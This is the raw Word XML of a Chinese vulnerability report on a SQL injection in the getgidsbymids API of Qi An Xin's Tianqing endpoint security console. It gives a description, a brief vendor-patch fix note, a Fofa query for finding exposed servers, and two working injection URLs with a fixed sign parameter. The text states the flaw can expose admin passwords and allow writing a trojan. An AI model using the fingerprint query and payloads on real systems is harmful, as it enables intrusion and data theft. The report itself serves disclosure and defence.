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天擎终端安全管理系统getgidsbymids方法 SQL 注入导致命令执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>奇安信天擎终端安全管理系统是面向政企单位推出的一体化终端安全产品解决方案。该产品集防病毒、终端安全管控、终端准入、终端审计、外设管控、EDR等功能于一体，兼容不同操作系统和计算平台，帮助客户实现平台一体化、功能一体化、数据一体化的终端安全立体防护。奇安信天擎终端安全管理系统控制台存在SQL注入漏洞。攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Fofa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>banner="QiAnXin web server" || banner="360 web server"  || body="appid\":\"skylar6" || body="/task/index/detail?id={item.id}" || body="已过期或者未授权，购买请联系4008-136-360"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5257800" cy="2242185"/>
            <wp:effectExtent l="0" t="0" r="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57800" cy="2242185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">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部分界面如下</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64785" cy="2583180"/>
            <wp:effectExtent l="0" t="0" r="825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64785" cy="2583180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="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验证如下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>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/api/client/getgidsbymids?sign=6824fb5c045b6ab3062c6f3053d04dbb&amp;t=123&amp;mids=4131%27</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left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/api/client/getgidsbymids?sign=6824fb5c045b6ab3062c6f3053d04dbb&amp;t=123&amp;mids=4131'))%3b+--+aw</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="1550670"/>
            <wp:effectExtent l="0" t="0" r="0"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3040" cy="155067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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="1753870"/>
            <wp:effectExtent l="0" t="0" r="5715" b="139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67325" cy="1753870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>修复建议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1、产商已发布安全版本，请联系产商进行修复。</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9E462"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0619E46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VlNmU0MDY3ZjU0MTgxOGRiNjg4OTc5NWFkNGI1NmUifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="304B5878"/>
    <w:rsid w:val="4442782C"/>
    <w:rsid w:val="5DC33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2023-12-28T07:09:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>----末悲</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-28T07:18:19Z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EA935BA3BE214EC38D1035FEB8BBB664_12</vt:lpwstr>
  </property>
</Properties>
</file>